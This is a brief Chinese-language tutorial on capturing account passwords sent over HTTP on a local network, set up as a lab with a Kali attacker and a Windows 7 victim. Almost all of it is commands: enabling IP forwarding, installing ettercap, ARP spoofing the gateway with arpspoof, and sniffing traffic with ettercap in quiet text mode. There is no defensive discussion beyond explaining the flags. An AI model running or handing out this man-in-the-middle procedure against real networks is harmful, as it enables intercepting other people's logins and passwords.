HTTP下帐号密码的截取

用到工具：

arpspoof     --》》IP欺骗

ettercap     --》》抓包 

攻击者：192.168.100.110 kali

实验者：192.168.100.50 win7

默认网关：192.168.100.2

开启IP转发

# echo 1 > /proc/sys/net/ipv4/ip_forward

安装ettercap

# apt-get install ettercap-text-only 

或者

# apt-get install ettercap-graphical

IP欺骗

# arpspoof -i eth0 -t 192.168.100.2 192.168.100.50

抓包

# ettercap -Tq -i eth0

-T：文本模式

q：安静模式

-i：网卡

end